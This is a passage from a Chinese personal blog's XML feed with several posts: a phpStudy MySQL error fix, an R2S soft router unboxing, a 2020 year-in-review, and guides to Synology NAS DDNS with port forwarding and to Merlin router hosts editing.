打开以后双击刚才创建的数据库,光标移至上面并右击“新建”–“表格”,弹出以下窗口。</p><p><img src="https://s2.loli.net/2022/09/16/Q96ast75VfPKo2b.png" alt="img"></p><p> 依葫芦画瓢,新建对应的字段用于存储数据。</p><p><img src="https://s2.loli.net/2022/09/16/pmhEPaXDBrqjgCN.png" alt="img"></p><p> 至此,数据库的准备工作就完成了。接下来,我会在下一篇文章中详细讲述编写登录和注册页面的源代码的过程,谢谢大家的支持!</p><h2 id="SQLfront报错"><a href="#SQLfront报错" class="headerlink" title="SQLfront报错"></a>SQLfront报错</h2><p> 在创建数据库的过程中,我遇到了一些意想不到的情况。例如,下图的1055号报错。</p><p><img src="https://s2.loli.net/2022/09/16/EDlvpc6Gt42fd5J.png" alt="img"></p><p> 解决方法:在“PHPstudy_pro”文件夹的“Extensions”子目录中找到MySQL对应的文件夹,并用记事本打开里面的my.ini文件。</p><p><img src="https://s2.loli.net/2022/09/16/Uw9MADmCXEjJdhL.png" alt="img"></p><p> 在【mysqld】下面添加方框内语句,保存后重启PHPstudy。</p><p><img src="https://s2.loli.net/2022/09/16/9e8tfc7b2yozusT.png" alt="img"></p><p> 重新进入SQLfront,没有再出现报错!</p><h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>感谢大家的耐心阅读,如有疑问,敬请在评论区留言!</p>]]></content>
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>前端</tag>
</tags>
</entry>
<entry>
<title>R2S软路由开箱&初体验</title>
<link href="/2021/01/26/R2S%E8%BD%AF%E8%B7%AF%E7%94%B1%E5%BC%80%E7%AE%B1-%E5%88%9D%E4%BD%93%E9%AA%8C/"/>
<url>/2021/01/26/R2S%E8%BD%AF%E8%B7%AF%E7%94%B1%E5%BC%80%E7%AE%B1-%E5%88%9D%E4%BD%93%E9%AA%8C/</url>
<content type="html"><![CDATA[<p>创作立场声明:本文只是单纯的经验分享,没有任何恰饭行为!转载前请联系作者授权,并附上此文章链接!图片因为博客搬迁丢失了,敬请谅解!</p><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>前段时间在油管上看到东东的视频,对这款r2s各种推荐,于是在心里默默地种草了。正好要搬新家了,准备买它做旁路由科学上网+去广告,以前的网件r7000就光荣退役做AP。后来终于没忍住,还是去东东的tb店铺果断拔草了这款软路由。P.S.由于我买的是满配版,所以不用自己刷固件(其实就是懒得折腾)</p><h2 id="开箱"><a href="#开箱" class="headerlink" title="开箱"></a>开箱</h2><p>打开包装,只有三样东西:软路由本体、充电器、USB2.0读卡器,简洁明了。</p><p>仔细看看r2s的构造:1个lan口(USB3.0转的),1个wan口,还有一个type-c的供电口。</p><p>下图是另外一面,可以看到买来就已经插好的SD卡。</p><h2 id="初体验"><a href="#初体验" class="headerlink" title="初体验"></a>初体验</h2><p>话不多说,我们连接电脑到它的后台页面看看。</p><p>首先在电脑浏览器输入192.168.2.1或者192.168.22.1(根据固件不同而不同),密码默认为password。</p><p>进入后台以后,我们看看它的主界面。可以看到,功能还挺多的。</p><p>接着来看看它的文件传输页面(这里我上传的是adguard home的openwrt版插件)</p><p>来看看它自带的软件吧(除了adguard home是我自己安装的以外,其它的都是固件自带)</p><p><strong>以后会专门写一篇文章,介绍adguard home(openwrt版)如何设置!</strong></p><p>这款软路由还支持多线多拨(真不知道这块arm架构的CPU和螃蟹网卡顶不顶得住!)</p><h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>好了,体验暂时到这里了,过段时间搬家了再来折腾旁路由的设置。如有疑问,欢迎在评论区留言!</p><p>2022/1/6更新:由于这款软路由的科学性能太差,故已将其在海鲜市场出售!ARM架构还是不行啊!</p>]]></content>
<categories>
<category>网络运维</category>
</categories>
<tags>
<tag>数码折腾</tag>
</tags>
</entry>
<entry>
<title>2020年度总结</title>
<link href="/2021/01/24/2020%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/"/>
<url>/2021/01/24/2020%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>前段时间是考试周,一直忙于复习而没有时间更新博客,现在放假了,就来写(shui)一篇吧,嘿嘿!</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><p>终于,我们要告别这个跌宕起伏令人悲喜交加的2020年。这是充满了挑战的一年,也是充满了机遇的一年,这一年,有人欢喜,有人悲伤;这一年,有人获得,有人失去。匆匆忙忙间,最终还是来到的告别的时候。再见了,让你我不开心的2020年;你好呀,充满了希望的2021年!<br>2020年,注定是不平凡的一年。身为一名武汉本地人,我能更深切地感受到新冠疫情给我的生活带来的影响:高考试卷难度下调,导致高考失利;线上教学效果甚微,让我对返校复学充满期盼;疫情期间武汉封城,导致我被困老家40余天······然而,疫情除了给我带来打击以外,也让我找到了能为之奋斗的目标–成为一名网络/信息安全工程师。高考后的暑假,我学会了自己组装一台台式电脑,学会了折腾智能路由器并给它们刷各种第三方固件,学会了搭建自己的私有云服务器;上大学以后,我不仅学会了用pr进行视频剪辑,用arctime pro制作字幕,还学会了用WordPress建立了自己的个人博客。回首2020,既有高考失利的失望,也有获得荣誉的骄傲,例如获得全国大学生英语竞赛全国一等奖,阿里云网站设计大赛优秀奖(毕竟零基础)······<br>回首上半年,我活的很颓废;回首下半年,我的生活有了光 。在其它学院的学长学姐的帮助下,我的大学生活逐渐步入正轨。第一次交女性朋友,第一次和女生出去玩,第一次参加志愿者活动······有太多的第一次。认识到了很多有趣的人,虽然不是我想象中的来自全国各地,但也让我很开心。纵使我没能考到理想的大学,认识这些人,让我觉得人间值得!</p><h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>希望在2021这新的一年,我能够顺利拿到驾照,通过四级考试,在美赛中再创佳绩,也祝我和我的室友们全体脱单!凡是过往,皆为序章,2021年,大家一起冲冲冲!</p>]]></content>
<categories>
<category>生活点滴</category>
</categories>
</entry>
<entry>
<title>群晖NAS配置DNSPodDDNS实现外网访问</title>
<link href="/2020/12/23/%E7%BE%A4%E6%99%96NAS%E9%85%8D%E7%BD%AEDNSPodDDNS%E5%AE%9E%E7%8E%B0%E5%A4%96%E7%BD%91%E8%AE%BF%E9%97%AE/"/>
<url>/2020/12/23/%E7%BE%A4%E6%99%96NAS%E9%85%8D%E7%BD%AEDNSPodDDNS%E5%AE%9E%E7%8E%B0%E5%A4%96%E7%BD%91%E8%AE%BF%E9%97%AE/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>本文将详解如何使用群晖NAS自带的DDNS功能来实现腾讯云DNSPod动态域名解析。这里我将以阿里云购买的域名为例。</p><h2 id="设置你的域名DNS服务器到DNSPod"><a href="#设置你的域名DNS服务器到DNSPod" class="headerlink" title="设置你的域名DNS服务器到DNSPod"></a>设置你的域名DNS服务器到DNSPod</h2><p>登录阿里云控制台,在搜索框内搜索“域名控制台”,点击你的域名并修改DNS(我的之前已经改好了)修改为:</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs stylus">f1g1ns1<span class="hljs-selector-class">.dnspod</span><span class="hljs-selector-class">.net</span><br>f1g1ns2<span class="hljs-selector-class">.dnspod</span>.net<br></code></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/09/16/jBdlwh9EH1Ksqa2.png" alt="img"></p><h2 id="设置域名解析"><a href="#设置域名解析" class="headerlink" title="设置域名解析"></a>设置域名解析</h2><p>注册dnspod并登录(也可用腾讯云账户直接登录)</p><p>dnspod官网:<a href="https://www.dnspod.cn/">https://www.dnspod.cn/</a></p><p>域名解析,添加域名,输入域名:</p><p><img src="https://s2.loli.net/2022/09/16/UuSO8yTfmnMIhNz.png" alt="img"></p><p>进入管理控制台,点击“DNS解析”:</p><p><img src="https://s2.loli.net/2022/09/16/TlZJwFUSoLtNdu6.png" alt="img"></p><p>点击你的域名,添加记录,设置解析你的域名A记录到任意IP(0.0.0.0):</p><p><img src="https://s2.loli.net/2022/09/16/mW6ojpl2QeFCEKP.png" alt="img">转到“密钥管理”并点击“创建密钥”:</p><p><img src="https://s2.loli.net/2022/09/16/mW6ojpl2QeFCEKP.png" alt="img"></p><p><img src="https://s2.loli.net/2022/09/16/EuHNOPWCo58ywr3.png" alt="img">复制保存生成的ID和token:</p><p><img src="https://s2.loli.net/2022/09/16/EuHNOPWCo58ywr3.png" alt="img"></p><p><strong>Token信息仅在创建时显示一次,请及时复制保存!</strong></p><h2 id="配置群晖DDNS"><a href="#配置群晖DDNS" class="headerlink" title="配置群晖DDNS"></a>配置群晖DDNS</h2><p>点击“控制面板”中的“外部访问”:</p><p><img src="https://s2.loli.net/2022/09/16/WHyu7lXDBrCpvwb.png" alt="img">在“DDNS”中选择“新增”:</p><p><img src="https://s2.loli.net/2022/09/16/muhqBA7rnWbxlQk.png" alt="img"></p><p>服务提供商选择DNSPod.cn:</p><p><img src="https://s2.loli.net/2022/09/16/8FkzRgC5N6o4jSW.png" alt="img">输入域名(www开头),用户名填写刚才创建的ID,密码填写刚才创建的Token,再点击确定:</p><p><img src="https://s2.loli.net/2022/09/16/Fer1cl9RVzJo8WZ.png" alt="img"></p><p>解析成功后状态会显示“正常”。</p><p>重启路由器,使公网IP变更。</p><p>群晖检测到新IP,并通知服务提供商更改域名指向,成功保持解析。</p><h2 id="配置路由器端口"><a href="#配置路由器端口" class="headerlink" title="配置路由器端口"></a>配置路由器端口</h2><p>配置路由器端口转发,使外网能够访问群晖DSM端口。</p><h3 id="查询或修改群晖DSM端口-本文以5000-x2F-5001为例"><a href="#查询或修改群晖DSM端口-本文以5000-x2F-5001为例" class="headerlink" title="查询或修改群晖DSM端口(本文以5000/5001为例)"></a>查询或修改群晖DSM端口(本文以5000/5001为例)</h3><p>在控制面板中选择“网络”并打开:</p><p><img src="https://s2.loli.net/2022/09/16/QbGcdgqUa2jnfoE.png" alt="img"></p><p>DSM默认端口:HTTP为5000,HTTPS为5001</p><p><img src="https://s2.loli.net/2022/09/16/NQJB2ERgqLGIZ45.png" alt="img"></p><h3 id="登录路由器配置端口转发(这里以梅林固件路由器为例)"><a href="#登录路由器配置端口转发(这里以梅林固件路由器为例)" class="headerlink" title="登录路由器配置端口转发(这里以梅林固件路由器为例)"></a>登录路由器配置端口转发(这里以梅林固件路由器为例)</h3><p>添加DSM的HTTP和HTTPS端口到群晖的内网IP上,选择TCP协议,按照下图填写后点击后面的加号,再点击底部的“应用保存设置”。</p><p>P.S.部分型号路由器保存后需要重启才能生效,如果DSM的默认端口修改过,这里需要把端口号改为修改过的端口号。</p><p><img src="https://s2.loli.net/2022/09/16/aMC4nNXyxWPphAT.png" alt="img">配置完成,现在可以用你的域名外网访问群晖NAS了!但是,仅仅这样设置是不能内网用域名访问NAS的。内网访问的方法,请参考本人的另一篇博客:</p><p><a href="https://hackerterry.netlify.app/2020/12/21/%E6%A2%85%E6%9E%97%E5%9B%BA%E4%BB%B6%E8%B7%AF%E7%94%B1%E5%99%A8%E4%BF%AE%E6%94%B9hosts%E5%AE%9E%E7%8E%B0%E5%86%85%E7%BD%91%E9%80%9A%E8%BF%87%E5%9F%9F%E5%90%8D%E8%AE%BF%E9%97%AE%E7%BE%A4%E6%99%96dsm/">https://hackerterry.netlify.app/2020/12/21/%E6%A2%85%E6%9E%97%E5%9B%BA%E4%BB%B6%E8%B7%AF%E7%94%B1%E5%99%A8%E4%BF%AE%E6%94%B9hosts%E5%AE%9E%E7%8E%B0%E5%86%85%E7%BD%91%E9%80%9A%E8%BF%87%E5%9F%9F%E5%90%8D%E8%AE%BF%E9%97%AE%E7%BE%A4%E6%99%96dsm/</a></p><h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>感谢大家的耐心阅读,如有疑问,敬请在下方留言!</p>]]></content>
<categories>
<category>网络运维</category>
</categories>
<tags>
<tag>教程</tag>
<tag>数码折腾</tag>
</tags>
</entry>
<entry>
<title>梅林固件路由器修改hosts实现内网通过域名访问群晖dsm</title>
<link href="/2020/12/21/%E6%A2%85%E6%9E%97%E5%9B%BA%E4%BB%B6%E8%B7%AF%E7%94%B1%E5%99%A8%E4%BF%AE%E6%94%B9hosts%E5%AE%9E%E7%8E%B0%E5%86%85%E7%BD%91%E9%80%9A%E8%BF%87%E5%9F%9F%E5%90%8D%E8%AE%BF%E9%97%AE%E7%BE%A4%E6%99%96dsm/"/>
<url>/2020/12/21/%E6%A2%85%E6%9E%97%E5%9B%BA%E4%BB%B6%E8%B7%AF%E7%94%B1%E5%99%A8%E4%BF%AE%E6%94%B9hosts%E5%AE%9E%E7%8E%B0%E5%86%85%E7%BD%91%E9%80%9A%E8%BF%87%E5%9F%9F%E5%90%8D%E8%AE%BF%E9%97%AE%E7%BE%A4%E6%99%96dsm/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近买了一台群晖nas,是已经停产的ds218play(因为没钱),开始了小白瞎折腾的漫长过程。因为长期住校,想通过域名访问家里群晖dsm实现多种功能,例如外网映射磁盘,但是这样以后发现内网无法用域名访问dsm!经过漫长的摸索以后,我这个小白竟然成功了!在这里分享给大家具体方法,不用putty,不用secureCRT即可实现!</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><p>首先在网上下载WinSCP软件,下载安装后如图</p><p><img src="https://s2.loli.net/2022/09/14/iQrxMAhg5B9W2cl.jpg" alt="img"></p><p>选择 SCP 协议,主机名也就是自己路由器的管理页面 IP,用户名和密码也和登陆路由管理页面用的一样,连接即可。端口不变,填写完后点登录,如图</p><p><img src="https://s2.loli.net/2022/09/14/41uNsDa2AlK37Cy.jpg" alt="img"></p><p>连上之后一路往回到路由根目录,进入/jffs/configs 目录,新建一个 dnsmasq.conf.add 文件,写入以下内容:<code>addn-hosts=/jffs/configs/hosts</code></p><p>写入方式就和平时windows编辑txt文本文档一样,注意文件名就是dnsmasq.conf.add</p><p>再新建一个文件,文件名就是hosts,再写入以下内容(我的群晖nas内网IP是192.168.50.66):</p><figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs accesslog"><span class="hljs-number">192.168.50.66</span> www.xxx.xxx<br><br># 例如:<span class="hljs-number">192</span>.<span class="hljs-number">168</span>.<span class="hljs-number">2</span>.<span class="hljs-number">164</span> smartplugconnect.phicomm.com<br></code></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/09/14/41uNsDa2AlK37Cy.jpg" alt="img"></p><p>两个文件添加完以后,弹出的对话框选择“是”,再重启路由器。然后局域网内任何一台电脑(最好是其它电脑)用windows 的命令行或者powershell,ping一下你的域名,出现nas的内网IP就成功了!</p>]]></content>
<categories>
<category>网络运维</category>
</categories>
<tags>
<tag>教程</tag>
<tag>数码折腾</tag>
</tags>
</entry>